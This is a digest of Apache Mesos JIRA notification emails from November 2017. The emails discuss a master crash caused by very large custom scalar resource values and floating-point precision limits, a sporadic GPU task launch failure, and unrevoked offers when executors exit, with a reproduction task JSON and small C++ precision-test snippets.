> that's just one I already had on the agent). When the sleep ends, the master 
> crashes.
> {code:javascript}
> {
>   "container": {
> "docker": {
>   "image": "ubuntu:xenial-20161010"
> }, 
> "type": "DOCKER"
>   }, 
>   "name": "test-task", 
>   "task_id": {
> "value": "0001"
>   }, 
>   "command": {
> "shell": false, 
> "value": "sleep", 
> "arguments": [
>   "10"
> ]
>   }, 
>   "agent_id": {
> "value": ""
>   }, 
>   "resources": [
> {
>   "scalar": {
> "value": 1
>   }, 
>   "type": "SCALAR", 
>   "name": "cpus"
> }, 
> {
>   "scalar": {
> "value": 4106.0
>   }, 
>   "type": "SCALAR", 
>   "name": "mem"
> }, 
> {
>   "scalar": {
> "value": 12465430.06012024
>   }, 
>   "type": "SCALAR", 
>   "name": "thing"
> }
>   ]
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Comment Edited] (MESOS-8129) Very large resource value crashes master

2017-11-13 Thread Benjamin Mahler (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8129?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250507#comment-16250507
 ] 

Benjamin Mahler edited comment on MESOS-8129 at 11/14/17 12:00 AM:
---

Did a binary search and found that the largest 0.001 precision value such that 
precision appears to be lost when incrementing by another 0.001 is: 
8,796,093,022,208.000. This is exactly 2^43; at that magnitude a double has 
only 9 fractional bits left, which is not enough precision to represent 
increments of 0.001 without loss.

Another 0.001 increment moves this to 8,796,093,022,208.002. This was tested 
with Apple's clang {{Apple LLVM version 9.0.0 (clang-900.0.38)}}.

We could perhaps validate a more conservative limit of 2^40, which is still 
over 1 trillion. cc [~mcypark]

[~bmerry] would you be able to send a pull request with the added validation?
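
Not Mesos source, but a minimal standalone sketch of the experiment above: it 
mimics a millis-based fixed-point round trip (the {{toFixed}}/{{toFloating}} 
helpers are illustrative, not the real conversion code) and shows that adding 
0.001 stays exact just below 2^43 but drifts to .002 at 2^43:
{code}
#include <cmath>
#include <cstdio>

// Illustrative helpers: treat a scalar as an integral number of
// "millis" (units of 0.001) and convert back to double.
long long toFixed(double d) { return std::llround(d * 1000.0); }
double toFloating(long long millis) { return millis / 1000.0; }

int main()
{
  const double limit = 8796093022208.0;  // 2^43.
  const double bases[] = {limit - 1.0, limit};

  for (double base : bases) {
    // "base + 0.001" done the fixed-point way, then converted back.
    double sum = toFloating(toFixed(base) + toFixed(0.001));

    // Prints ...207.001 for the first base, but ...208.002 for 2^43.
    std::printf("%.3f + 0.001 = %.3f\n", base, sum);
  }

  return 0;
}
{code}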


was (Author: bmahler):
Did a binary search and found that the largest 0.001 precision value such that 
precision appears to be lost when incrementing by another 0.001 is: 
8,796,093,022,208.000. Another 0.001 increment moves this to 
8,796,093,022,208.002. This was tested with Apple's clang {{Apple LLVM version 
9.0.0 (clang-900.0.38)}}.

We could perhaps validate a limit of 2^32 which is a little less than half of 
this limit: 4,294,967,296. cc [~mcypark]

[~bmerry] would you be able to send a pull request with the added validation?

> Very large resource value crashes master
> 
>
> Key: MESOS-8129
> URL: https://issues.apache.org/jira/browse/MESOS-8129
> Project: Mesos
>  Issue Type: Bug
>  Components: agent, master
>Affects Versions: 1.4.0
> Environment: Ubuntu 14.04
> Both apt packages from Mesosphere repo and Docker images
>Reporter: Bruce Merry
>Assignee: Benjamin Mahler
>Priority: Minor
>
> I ran into a master that kept failing on this CHECK when destroying a task:
> https://github.com/apache/mesos/blob/1.4.0/src/master/allocator/sorter/drf/sorter.hpp#L367
> I found that a combination of a misconfiguration and a suboptimal choice of 
> units had led to an agent with a custom scalar resource of capacity 
> 429496729500. I believe what is happening is that the pseudo-fixed-point 
> arithmetic isn't able to cope with such large numbers, because rounding 
> errors after arithmetic are bigger than 0.001. Examining the values in the 
> debugger showed that the CHECK failed due to a rounding error on the order of 0.2.
> While this is probably a fundamental limitation of the fixed-point 
> implementation and such large resource values are probably a bad idea, it 
> would have helped if the agent had complained on startup, rather than having 
> to debug an internal assertion failure. I'd suggest that values larger than, 
> say, 10^12 should be rejected when the agent starts (which is why I've added 
> the agent component), although someone familiar with the details of the 
> fixed-point implementation should probably verify that number.
> I'm not sure where this needs to be fixed e.g. if it can just be validated on 
> agent startup or if it should be baked into the Resource class to prevent 
> accidents in requests from the user.
> To reproduce the issue, start a master and an agent with a custom scalar 
> resource "thing:429496729500", then use mesos-execute to throw the 
> following task at it (it'll probably also work with a smaller Docker image - 
> that's just one I already had on the agent). When the sleep ends, the master 
> crashes.
> {code:javascript}
> {
>   "container": {
> "docker": {
>   "image": "ubuntu:xenial-20161010"
> }, 
> "type": "DOCKER"
>   }, 
>   "name": "test-task", 
>   "task_id": {
> "value": "0001"
>   }, 
>   "command": {
> "shell": false, 
> "value": "sleep", 
> "arguments": [
>   "10"
> ]
>   }, 
>   "agent_id": {
> "value": ""
>   }, 
>   "resources": [
> {
>   "scalar": {
> "value": 1
>   }, 
>   "type": "SCALAR", 
>   "name": "cpus"
> }, 
> {
>   "scalar": {
> "value": 4106.0
>   }, 
>   "type": "SCALAR", 
>   "name": "mem"
> }, 
> {
>   "scalar": {
> "value": 12465430.06012024
>   }, 
>   "type": "SCALAR", 
>   "name": "thing"
> }
>   ]
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8038) Launching GPU task sporadically fails.

2017-11-13 Thread Benjamin Mahler (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8038?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250520#comment-16250520
 ] 

Benjamin Mahler commented on MESOS-8038:


[~saitejar] to follow up from our discussion on slack, are you able to send a 
test framework that we can easily run to reproduce?

> Launching GPU task sporadically fails.
> --
>
> Key: MESOS-8038
> URL: https://issues.apache.org/jira/browse/MESOS-8038
> Project: Mesos
>  Issue Type: Bug
>  Components: allocation, gpu
>Affects Versions: 1.4.0
>Reporter: Sai Teja Ranuva
>Priority: Critical
> Attachments: mesos-master.log, mesos-slave.INFO.log
>
>
> I was running a job which uses GPUs. It runs fine most of the time. 
> But occasionally I see the following message in the mesos log.
> "Collect failed: Requested 1 but only 0 available"
> This is followed by the executor getting killed and the tasks getting lost. This 
> happens even before the job starts. A little search in the code base points me to 
> something related to the GPU resource being the probable cause.
> There is no deterministic way that this can be reproduced. It happens 
> occasionally.
> I have attached the slave log for the issue.
> Using 1.4.0 Mesos Master and 1.4.0 Mesos Slave.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8209) mesos master should revoke offers when executor state changes

2017-11-13 Thread Vinod Kone (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8209?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250547#comment-16250547
 ] 

Vinod Kone commented on MESOS-8209:
---

{quote}
However, if you start tasks fast enough, the agents can fill up with executors, 
making it appear as if there are no resources available for the scheduler to 
use. I've seen this on r4.4xlarge machines on AWS with executors that consume 
0.1 cpus and 32 MB mem, where the entire machine appears to be filled with 
executors according to the master's resource offers. The executors are exiting 
(just after the task finishes), but the resources are not reclaimed because the 
master does not revoke the outstanding resource offers to reflect the change.
{quote}

I don't quite follow this. The master reclaims/recovers an executor's resources 
as soon as the agent notifies it of the executor's termination. It should have 
no bearing on whether a scheduler is holding onto offers. In other words, what 
the scheduler is holding onto are offered but unallocated resources, while what 
the master recovers on task/executor termination are allocated resources.

Can you share some logs that show the issue?

> mesos master should revoke offers when executor state changes
> -
>
> Key: MESOS-8209
> URL: https://issues.apache.org/jira/browse/MESOS-8209
> Project: Mesos
>  Issue Type: Bug
>Reporter: Jack Crawford
>Assignee: Vinod Kone
>
> Currently, the mesos master does not revoke offers when the number of 
> executors on an agent decreases. This is a problem under certain conditions, 
> such as when running a workflow that starts lots of small tasks on agents, 
> with a one-executor-per-task model, a master that does not revoke resources 
> after a set amount of time, and a scheduler that does not reject resources.
> The problem is that when running a mono-scheduler framework (which you might 
> want to do to easily enforce authentication requirements, have a full view of 
> all scheduled tasks, etc.), in order to respond instantly when new tasks come 
> in, I have the scheduler simply hang on to all resource offers it receives, 
> and the master is set to never revoke offers. This way the scheduler always 
> has a pool of resources to quickly service new requests as they come in.
> However, if you start tasks fast enough, the agents can fill up with 
> executors, making it appear as if there are no resources available for the 
> scheduler to use. I've seen this on r4.4xlarge machines on AWS with executors 
> that consume 0.1 cpus and 32 MB mem, where the entire machine appears to be 
> filled with executors according to the master's resource offers. The executors 
> are exiting (just after the task finishes), but the resources are not 
> reclaimed because the master does not revoke the outstanding resource offers 
> to reflect the change.
> You can replicate this pretty easily if you schedule tasks that finish 
> instantly with a 1-1 executor to task ratio. I find that if I schedule ~1000 
> tasks this way on a single r4.4xlarge machine, usually 600-700 will finish 
> before all the resource offers to the scheduler fill up and the agent appears 
> to be "full" of executors.
> Changing the scheduler/master to periodically reject/revoke resources fixes 
> the problem.
> My suggestion is for the master to revoke and reissue resource offers when 
> the executor count changes on an agent.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8129) Very large resource value crashes master

2017-11-13 Thread Bruce Merry (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8129?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250928#comment-16250928
 ] 

Bruce Merry commented on MESOS-8129:


> Also, I'm curious what your use case is, can you tell me?

We have tasks with high but very predictable network bandwidth. I create a 
resource for incoming and outgoing bandwidth on each interface (not isolated). 
I used bits/second as the unit, because I was tired of writing multiplications 
and divisions by 10^6 for "mem" resources, which is why the numbers get high. 
Then a script sets the resources for each agent by reading 
/sys/class/net//speed and multiplying by 10^6. It turns out that 
unplugging the NIC causes that file to contain 4294967295, which resulted in a 
resource being set as 429496729500.

Here's my theoretical analysis. Let's say that we set the limit to X, which is 
a power of 2. Numbers slightly less than X have X/2 as the implicit 1, and 
X/2^53 as ULP. Thus, rounding a multiple of 0.001 to the nearest float 
introduces error up to X/2^54. Adding/subtracting two such values then has 
error up to X/2^53. This needs to be less than 0.0005, so that we can turn it 
into the proper multiple of 0.001. The largest power-of-2 X satisfying this is 
2^42.

I agree that a more conservative limit of 2^40 is probably a better idea, and 
would still be large enough for my use case (we have 40Gb/s NICs, so we'd still 
have 10x headroom).
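
As a quick numeric check of that bound (my own sketch, not Mesos code): the 
rounding error bounded by X/2^53 above is the ULP of values just below X, and 
it stays under 0.0005 just below 2^42 but not just below 2^43:
{code}
#include <cmath>
#include <cstdio>

int main()
{
  // 2^42 and 2^43.
  const double limits[] = {4398046511104.0, 8796093022208.0};

  for (double x : limits) {
    // ULP of the value just below x: prints 0.00048828125 (< 0.0005)
    // for 2^42 and 0.00097656250 (> 0.0005) for 2^43.
    double below = std::nextafter(x, 0.0);
    std::printf("ULP just below %.0f is %.11f\n", x, x - below);
  }

  return 0;
}
{code}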

> Bruce Merry would you be able to send a pull request with the added 
> validation?

Eventually maybe, but the next several months are a crunch time for us so I 
definitely won't be able to until April, and there is still another issue where 
I want to contribute code first. There is also still the question of where the 
validation should happen: only at agent startup, or also when processing client 
requests?

> Very large resource value crashes master
> 
>
> Key: MESOS-8129
> URL: https://issues.apache.org/jira/browse/MESOS-8129
> Project: Mesos
>  Issue Type: Bug
>  Components: agent, master
>Affects Versions: 1.4.0
> Environment: Ubuntu 14.04
> Both apt packages from Mesosphere repo and Docker images
>Reporter: Bruce Merry
>Assignee: Benjamin Mahler
>Priority: Minor
>
> I ran into a master that kept failing on this CHECK when destroying a task:
> https://github.com/apache/mesos/blob/1.4.0/src/master/allocator/sorter/drf/sorter.hpp#L367
> I found that a combination of a misconfiguration and a suboptimal choice of 
> units had led to an agent with a custom scalar resource of capacity 
> 429496729500. I believe what is happening is that the pseudo-fixed-point 
> arithmetic isn't able to cope with such large numbers, because rounding 
> errors after arithmetic are bigger than 0.001. Examining the values in the 
> debugger showed that the CHECK failed due to a rounding error on the order of 0.2.
> While this is probably a fundamental limitation of the fixed-point 
> implementation and such large resource values are probably a bad idea, it 
> would have helped if the agent had complained on startup, rather than having 
> to debug an internal assertion failure. I'd suggest that values larger than, 
> say, 10^12 should be rejected when the agent starts (which is why I've added 
> the agent component), although someone familiar with the details of the 
> fixed-point implementation should probably verify that number.
> I'm not sure where this needs to be fixed e.g. if it can just be validated on 
> agent startup or if it should be baked into the Resource class to prevent 
> accidents in requests from the user.
> To reproduce the issue, start a master and an agent with a custom scalar 
> resource "thing:429496729500", then use mesos-execute to throw the 
> following task at it (it'll probably also work with a smaller Docker image - 
> that's just one I already had on the agent). When the sleep ends, the master 
> crashes.
> {code:javascript}
> {
>   "container": {
> "docker": {
>   "image": "ubuntu:xenial-20161010"
> }, 
> "type": "DOCKER"
>   }, 
>   "name": "test-task", 
>   "task_id": {
> "value": "0001"
>   }, 
>   "command": {
> "shell": false, 
> "value": "sleep", 
> "arguments": [
>   "10"
> ]
>   }, 
>   "agent_id": {
> "value": ""
>   }, 
>   "resources": [
> {
>   "scalar": {
> "value": 1
>   }, 
>   "type": "SCALAR", 
>   "name": "cpus"
> }, 
> {
>   "scalar": {
> "value": 4106.0
>   }, 
>   "type": "SCALAR", 
>   "name": "mem"
> }, 
> {
>   "scalar": {
> "value": 12465430.06012024
>   }, 
>   "type": "SCALAR", 
>   "name": "thing"
> }
>   ]
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)